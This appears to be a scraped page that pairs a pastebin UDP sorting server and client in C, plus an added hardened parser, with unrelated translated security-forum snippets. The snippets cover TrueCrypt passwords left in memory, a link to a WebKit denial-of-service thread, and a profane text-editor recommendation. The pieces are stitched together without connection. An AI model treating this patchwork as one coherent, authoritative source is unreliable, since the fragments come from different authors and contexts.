```c
/*
 ============================================================================
 Name        : UDPServer.c
 Author      : www.facebook.com/unix4u
 Version     :
 Copyright   : LGPL
 Description : UDP SERVER in C, Ansi-style
 ============================================================================
 */
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>

void signalhandler(int signum)
{
    if (SIGTERM == signum) {
        printf("See you later bye\n");
        exit(SIGTERM);
    }
}

int main(int argc, char *argv[])
{
    struct sockaddr_in server_addr, client_addr;
    char readbuffer[256] = "", writebuffer[256] = "";
    int server_sock_fd;
    socklen_t len;

    signal(SIGTERM, signalhandler);

    if (argc != 2) {
        printf("please run as ./UDPServer <port-no>\n");
        exit(1);
    }

    server_sock_fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (server_sock_fd < 0) {
        perror("Create socket");
        exit(errno);
    }

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(atoi(argv[1]));
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);

    if (bind(server_sock_fd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Bind");
        exit(errno);
    }

    while (1) {
        int i, j, k, ntemp, array[20];
        char temp[256];
        ssize_t n;

        /* len is an in/out argument: reset it before every recvfrom() */
        len = sizeof(client_addr);
        n = recvfrom(server_sock_fd, readbuffer, sizeof(readbuffer) - 1, 0,
                     (struct sockaddr *)&client_addr, &len);
        if (n < 0) {
            perror("Get Data");
            continue;
        }
        readbuffer[n] = '\0';   /* the datagram may be shorter than the buffer */

        if (strcmp(readbuffer, "stop") == 0)   /* 0 means equal */
            break;

        /* same parsing as the TCP server: digits only, at most 9 per
           number, at most 20 numbers (array has 20 slots) */
        j = 0;
        k = 0;
        for (i = 0; i <= (int)strlen(readbuffer); i++) {
            if (readbuffer[i] != ':' && readbuffer[i] != '\0') {
                if (isdigit((unsigned char)readbuffer[i]) && j < 9)
                    temp[j++] = readbuffer[i];
            } else {
                temp[j] = '\0';            /* terminate before atoi() */
                if (j > 0 && k < 20)
                    array[k++] = atoi(temp);
                j = 0;
            }
        }

        /* bubble sort, ascending */
        for (i = 0; i < k; i++) {
            for (j = 0; j < k - i - 1; j++) {
                if (array[j] > array[j + 1]) {
                    ntemp = array[j];
                    array[j] = array[j + 1];
                    array[j + 1] = ntemp;
                }
            }
        }

        /* reply " a b c " to the address recvfrom() filled in */
        strcpy(writebuffer, " ");
        for (i = 0; i < k; i++) {
            sprintf(temp, "%d ", array[i]);
            strcat(writebuffer, temp);
        }

        if (sendto(server_sock_fd, writebuffer, strlen(writebuffer) + 1, 0,
                   (struct sockaddr *)&client_addr, len) < 0)
            perror("Send Data");
    }

    if (close(server_sock_fd) < 0)
        perror("Server Termination");
    return 0;
}
```

```c
/*
 ============================================================================
 Name        : UDPClient.c
 Author      : www.facebook.com/unix4u
 Version     :
 Copyright   : LGPL
 Description : UDP Client in C, Ansi-style
 ============================================================================
 */
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <signal.h>

void signalhandler(int signum)
{
    (void)signum;   /* only SIGALRM is installed */
    printf("Host Timed out\n");
    exit(ETIMEDOUT);
}

int main(int argc, char *argv[])
{
    struct sockaddr_in server_addr;
    socklen_t len = sizeof(server_addr);
    char readbuffer[256] = "", writebuffer[256] = "";
    int server_sock_fd, i;
    size_t used = 0;
    ssize_t n;

    signal(SIGALRM, signalhandler);

    if (argc < 4) {
        printf("please run as ./UDPClient <ip-address> <port-no> <numbers>/stop\n");
        exit(1);
    }

    /* join argv[3..] as "n1:n2:...:nk" (or just "stop"), refusing to
       overflow the 256-byte request buffer */
    for (i = 3; i < argc; i++) {
        size_t need = strlen(argv[i]) + (i > 3 ? 1 : 0);
        if (used + need >= sizeof(writebuffer)) {
            fprintf(stderr, "too many numbers for the 256-byte request buffer\n");
            exit(1);
        }
        if (i > 3)
            strcat(writebuffer, ":");
        strcat(writebuffer, argv[i]);
        used += need;
    }

    server_sock_fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (server_sock_fd < 0) {
        perror("Create socket");
        exit(errno);
    }

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(atoi(argv[2]));
    /* inet_pton() returns 1 on success and 0 for a malformed address
       without touching errno, so it cannot be checked through perror() */
    if (inet_pton(AF_INET, argv[1], &server_addr.sin_addr) != 1) {
        fprintf(stderr, "Ip address conversion: invalid IPv4 address '%s'\n", argv[1]);
        exit(1);
    }

    if (sendto(server_sock_fd, writebuffer, strlen(writebuffer) + 1, 0,
               (struct sockaddr *)&server_addr, len) < 0) {
        perror("Send Data");
        exit(errno);
    }

    alarm(5);   /* UDP reports no error when nobody listens: time out after 5 s */
    n = recvfrom(server_sock_fd, readbuffer, sizeof(readbuffer) - 1, 0,
                 (struct sockaddr *)&server_addr, &len);
    if (n < 0) {
        perror("Get Data");
        exit(errno);
    }
    readbuffer[n] = '\0';
    puts(readbuffer);

    if (close(server_sock_fd) < 0)
        perror("Close connection");
    return 0;
}
```

Source: [C] TCPUDP in C - Pastebin.com
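The servers above accept a "n1:n2:...:nk" request into a 256-byte buffer and keep the values in int array[20]. The parser below is an added example, not code from the pastebin post or its author; parse_request, MAXNUMS and MAXDIGITS are names chosen here. It shows the checks that request format needs before atoi(): stop at the received byte count and at the first NUL, cap the number of fields at the array size, cap the digits per field so the int cannot overflow, and reject anything that is not a digit or ':'.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define MAXNUMS   20   /* the posted servers store values in int array[20] */
#define MAXDIGITS 9    /* 9 decimal digits always fit in a 32-bit int */

/* Parse the n bytes received into out[]. Returns the number of values
 * (0..MAXNUMS) or -1 for a malformed request: a byte that is not a digit
 * or ':', an empty field ("1::2", leading or trailing ':'), more than
 * MAXNUMS fields, or more than MAXDIGITS digits in one field (atoi()
 * would overflow). The caller compares the buffer against "stop" first. */
int parse_request(const char *buf, size_t n, int out[MAXNUMS])
{
    char field[MAXDIGITS + 1];
    size_t i, j = 0;
    int k = 0;

    /* honour both the byte count and an embedded NUL; never read past n */
    for (i = 0; i < n && buf[i] != '\0'; i++) {
        if (buf[i] == ':') {
            if (j == 0 || k == MAXNUMS)
                return -1;                    /* empty field or 21st value */
            field[j] = '\0';                  /* terminate before atoi() */
            out[k++] = atoi(field);
            j = 0;
        } else if (isdigit((unsigned char)buf[i])) {
            if (j == MAXDIGITS)
                return -1;                    /* would not fit in an int */
            field[j++] = buf[i];
        } else {
            return -1;                        /* letters, spaces, '-' ... */
        }
    }
    if (j > 0) {                              /* flush the last field */
        if (k == MAXNUMS)
            return -1;
        field[j] = '\0';
        out[k++] = atoi(field);
    } else if (i > 0) {
        return -1;                            /* request ended with ':' */
    }
    return k;
}
```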
-
Nowadays everything is about money...
-
And will the talks be held in... Romanian? I mean the Romanian speakers' talks, of course.
-
Yes. When you use TrueCrypt, the password is kept in memory so the data can be decrypted when needed. The program just reads it from there. It's not exactly "rocket science". Stupidly, news stories were written about this tool: $300 tool can decrypt PGP, TrueCrypt files without a password | Chips | Geek.com. It's something absolutely normal. If you give someone a hard disk encrypted with TrueCrypt, without it having been decrypted by a running TrueCrypt with the correct password entered, it is useless.
-
It has been discussed before, but in a technical manner, nicely presented. [ https://rstforums.com/forum/74740-dos-exploit-pentru-webkit-nu-deschide-pagina-dac-folose-ti-mac-os-10-8-sau-ios-6-a.rst ] The version for the plebs is fine too.
-
Text Editor
Edit text files, XML, HTML, Unicode and UTF-8 files, C/C++ source code, PHP, etc. Unlimited undo and powerful editing and scripting tools.

Hex Editor
Unequalled binary editing performance. Edit any file of any size. Use powerful Binary Templates technology to understand binary data.

Disk Editor
Find and fix problems with hard drives, memory keys, flash drives, CD-ROMs, etc.

Process Editor
Investigate and modify memory from processes.

Download: http://www.sweetscape.com/download/download_010editor.html

Opinion: I had a big text file, 250 MB. I had to select about 80 MB of it and put that data into another file. Notepad++ and gVim suck hard; Notepad++ at least chokes, and it also fucked up my Clipboard, so fuck Notepad++. I spent about 20 minutes selecting the text with Page Down held down, and got fuck all. With this little program I did:
1. Mark selection start
2. Mark selection end
3. Copy/Paste
Fuck Notepad++.
PS: It's a trial.
-
I moved a few (4-5) tutorials here. I think it would be easier for everyone to find them if we group them like this. There are many others under Tutorials, and if someone is especially interested in this subject they can find them here much more easily.